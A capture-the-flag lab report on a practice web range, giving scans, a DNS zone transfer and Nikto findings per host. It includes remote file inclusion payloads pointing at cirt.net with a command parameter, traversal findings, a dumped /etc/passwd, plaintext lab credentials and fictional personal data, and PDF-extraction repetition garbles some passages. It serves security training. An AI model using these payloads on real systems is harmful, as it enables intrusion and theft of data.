DISCOVERY
IP ADDRESS 10.42.50.26/16 (Internal) towards 10.42.5.0/24 (W eb Servers)
No IP 1 10.42.5.8 (helpdesk.sec542.org) 2 10.42.5.21 (home.sec542.org) 3 10.42.5.24 (sec542.org) (ns1.sec542.org) (www.sec542.org) 4 10.42.5.42 (phones.sec542.org) 5 10.42.5.75
OS Ubuntu Linux OS (Linux Kernel 2.6.13 2.6.32) Ubuntu Linux OS (Linux Kernel 2.6.13 2.6.32) Ubuntu Linux OS (Linux Kernel 2.6.13 2.6.32)
Ports 53/TCP 80/TCP
Services DOMAIN HTTP
53/TCP 80/TCP
DOMAIN HTTP
Status Banners OPEN ISC BIND 9.5.0-P2 OPEN Apache httpd 2.2.9 PHP/5.2.6-2ubuntu4.1 OPEN ISC BIND 9.5.0-P2 OPEN Apache httpd 2.2.9
53/TCP 80/TCP
DOMAIN HTTP
OPEN OPEN
ISC BIND 9.5.0-P2 Apache httpd 2.2.9
Ubuntu Linux OS (Linux Kernel 2.6.13 2.6.32) Ubuntu Linux OS (Linux Kernel 2.6.13 2.6.32)
53/TCP 80/TCP
DOMAIN HTTP
OPEN OPEN
ISC BIND 9.5.0-P2 Apache httpd 2.2.9
53/TCP 80/TCP
DOMAIN HTTP
OPEN OPEN
ISC BIND 9.5.0-P2 Apache httpd 2.2.9
AXFR OUTPUT sec542.org. 604800 IN SOA ns1.sec542.org. root.sec542.org. 42 604800 86400 2419200 604800 sec542.org. 604800 IN NS 10.42.5.24.sec542.org. sec542.org. 604800 IN A 10.42.5.24 helpdesk.sec542.org. 604800 IN A 10.42.5.8
home.sec542.org. 604800 IN A 10.42.5.21 ns1.sec542.org. 604800 IN CNAME www.sec542.org. phones.sec542.org. 604800 IN A 10.42.5.42 www.sec542.org. 604800 IN A 10.42.5.24 sec542.org. 604800 IN SOA ns1.sec542.org. root.sec542.org.
TRACEROUTE 1 Hop
FINDINGS
10.42.5.8 (helpdesk.sec542.org) Port 80: Nikto + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4) + Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/enhttp://msdn.microsoft.com/enus/library/e8z01xdh%28VS.80%29.aspx us/library/e8z01xdh% 28VS.80%29.aspx for details. + OSVDB-877: HTTP TRACE method is active, suggesting the ho st is vulnerable to XST + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts. + OSVDB-3268: /icons/: Directory indexing found. + Server leaks inodes via ETags, header found with file / icons/README, icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80 + OSVDB-3233: /icons/README: Apache default file found. Directory discovered: /index.php /icons/ /server-status /424242.php?ticket=9 Issue discovered: /server-status (LOW) /424242.php?ticket=? (INFO -> HIGH/SALARY)
Improper redirection after login (LOW)
Information Gathered Application /424242.php?ticket=? : Arthur (IT Helpdesk) Ed Skoudis () – Salary 1,000,000/year Justin Searle () – Salary 1,000,000/year Kevin Johnson () – Salary 1,000,000/year Marvin (IT Security) Mike Poor () – Salary 1,000,000/year Peter Jones () Richard Vernon () Susan Sheridan () Tricia McMillan (HR) Zaphod ()
10.42.5.21 (home.sec542.org) Port 80: Nikto: + The anti-clickjacking X-Frame-Options header is not present. + PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4) + Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/enhttp://msdn.microsoft.com/enus/library/e8z01xdh%28VS.80%29.aspx us/library/e8z01xdh% 28VS.80%29.aspx for details. + OSVDB-877: HTTP TRACE method is active, suggesting the ho st is vulnerable to XST + OSVDB-3268: /doc/: Directory indexing found. + OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive
information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /includes/: Directory indexing found. + OSVDB-3092: /includes/: This might be interesting... + OSVDB-3268: /icons/: Directory indexing found. + Server leaks inodes via ETags, header found with file / icons/README, icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80 + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /it/: This might be interesting... potential country code (Italy) + /iframe.php?file=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible. Directory discovered: /base/ /content/ /icons/ /includes/ /wordpress/ /iframe.php /index.php /doc/ /it/ /sec542_oldforum/
Issue discovered: XSS – URL: /wordpress/wp-admin/upgrade.php PARAM: backto (GET) (LOW) Directory Traversal – URL /iframe.php PARAM: content (POST) (HIGH) Directory Traversal – URL /it/ls.php PARAM: directory (GET) (HIGH) File Inclusion – URL /iframe.php PARAM: content (POST) (HIGH) PHP Objection Injection – Wordpress 3.6.1 (HIGH) Information Gathered Error Message: Document root: /ctf/phones/
Application /sec542_oldforum/ PHPBB: Username: admin (Admin User), Email:
[email protected] , Password: foobar Username: testuser (Normal User), Email:
[email protected] , Password: password Username: sec542 (Normal User), Email:
[email protected] , Password: sec542 Application /iframe.php (content= ../../e mployees): Kevin Johnson, 904-403-8024, 1111 Main St Jacksonville, FL Mike Poor, 904-555-1234, 673C Jones Dr. Jacksonville FL Ed Skoudis, 904-555-8888, 4444 Rouge Pl. Jacksonville FL Justin Searle, 904-555-0364, 364 Guy Rd Jacksonville FL Application /base/ BASE Username: admin , Password: baser0ckz UNIX passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false avahi-autoipd:x:104:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false gdm:x:105:113:Gnome Display Manager:/var/lib/gdm:/bin/false pulse:x:106:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false saned:x:107:118::/home/saned:/bin/false messagebus:x:108:119::/var/run/dbus:/bin/false polkituser:x:109:120:PolicyKit,,,:/var/run/PolicyKit:/bin/false avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false haldaemon:x:111:122:Hardware abstraction layer,,,:/var/run/hald:/bin/false sec542:x:1000:1000:Sec542 CtF,,,:/home/sec542:/bin/bash mysql:x:112:125:MySQL mysql:x:112:125:MySQL Server,,,:/var/lib/mysql:/bin/false Server,,,:/var/lib/mysql:/bin/false bind:x:113:126::/var/cache/bind:/bin/false
10.42.5.24 (ns1.sec542.org, www.sec542.org www.sec542.org,, sec542.org) Port 80: Nikto: + The anti-clickjacking X-Frame-Options header is not present. + PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4) + Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the ho st is vulnerable to XST + OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts. + OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found. Directory discovered: /about.html /contact.html /index.html /style.css /icons/ Issue discovered: DNS AXFR (LOW) Email Is Not Obfuscated (LOW) Information Gathered Application (Portal/About Us)/: Ford Prefect -- President -- f
[email protected] Trillian -- Vice President --
[email protected] Marvin Android -- Security --
[email protected] Arthur Dent -- Help Desk --
[email protected]
10.42.5.42 (phones.sec542.org) Port 80: Nikto: + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4) + Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/enhttp://msdn.microsoft.com/enus/library/e8z01xdh%28VS.80%29.aspx us/library/e8z01xdh% 28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-877: HTTP TRACK method is active, suggesting the ho st is vulnerable to XST + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /icons/: Directory indexing found. + Server leaks inodes via ETags, header found with file / icons/README, icons/README, inode: 221848, size: 5108, mtime: 0x438c0358aae80 + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-5292: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /?show=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?1=lol&PAGES[lol]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?AML_opensite=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: RFI f rom RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?ConfigDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weir (http://ha.ckers.org/weird/rfid/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?HomeDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?Lang=AR&Page=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/r (http://ha.ckers.org/weird/rfifi-
locations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?Madoa=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfi(http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?RP_PATH=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ Directory discovered: /index.php /icons/ Issue discovered: PHPInfo (LOW) Information Gathered Application /: ServerName: zaphod Linux Kernel 2.6.27-11-generic i686 Email:
[email protected] Document root: /ctf/phones/
10.42.5.75 Port 80: Nikto: + The anti-clickjacking X-Frame-Options header is not present. + Retrieved x-powered-by header: PHP/5.2.6-2ubuntu4.1 + No CGI Directories found (use '-C all' to force check all possible dirs) + Multiple index files found: index.php, index.html + PHP/5.2.6-2ubuntu4.1 appears to be outdated (current is at least 5.4.4) + Apache/2.2.9 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are
also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the ho st is vulnerable to XST + OSVDB-3268: /~root/: Directory indexing found. + OSVDB-637: /~root/: Allowed to browse root's home directory. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-5292: /index.php?1=lol&PAGES[lol]=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?AML_opensite=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: RFI f rom RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: RFI f rom RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?ConfigDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) (http://ha.ckers.org/weird/rfi-locations. dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?HomeDir=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?Lang=AR&Page=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/ + OSVDB-5292: /index.php?Madoa=http://cirt.net/rfiinc.txt??: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/
+ OSVDB-5292: /index.php?RP_PATH=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfilocations.dat) or from http://osvdb.org/
Directory discovered: /icons/ /images/ /~root/ /~root/report.html /index.html /index.php
Issue discovered: /~root/ (Bruteforce UNIX account) Information Gathered Application (Social Security) /~root/report.html: Kevin Johnson 555-55-7777 Mike Poor 123-45-6789 Ed Skoudis 999-88-7777 Justin Searle 567-42-1234
CTF INFORMATION GATHERING SUMMARY
No
Name
Position
Email
[email protected]
1 2
Arthur Dent Ed Skoudis
Help Desk
3 4
Ford Prefect Justin Searle
President
5
Kevin Johnson
6 7 8 9
Marvin Android Mike Poor
12
Peter Jones Richard Vernon Susan Sheridan Tricia McMillan Trillian
13
Zaphod
10 11
IT Security
Phone No.
Social Security No.
Salary (Per Year)
Address
904-5558888
999-887777
1,000,000
4444 Rouge Pl. Jacksonville FL
904-5550364 904-4038024
567-421234 555-557777
1,000,000
364 Guy Rd Jacksonville FL 1111 Main St Jacksonville, FL
904-5551234
123-456789
1,000,000
[email protected]
1,000,000
[email protected]
Vice
[email protected] President Server Admin
[email protected] [email protected] 542.org
673C Jones Dr. Jacksonville FL
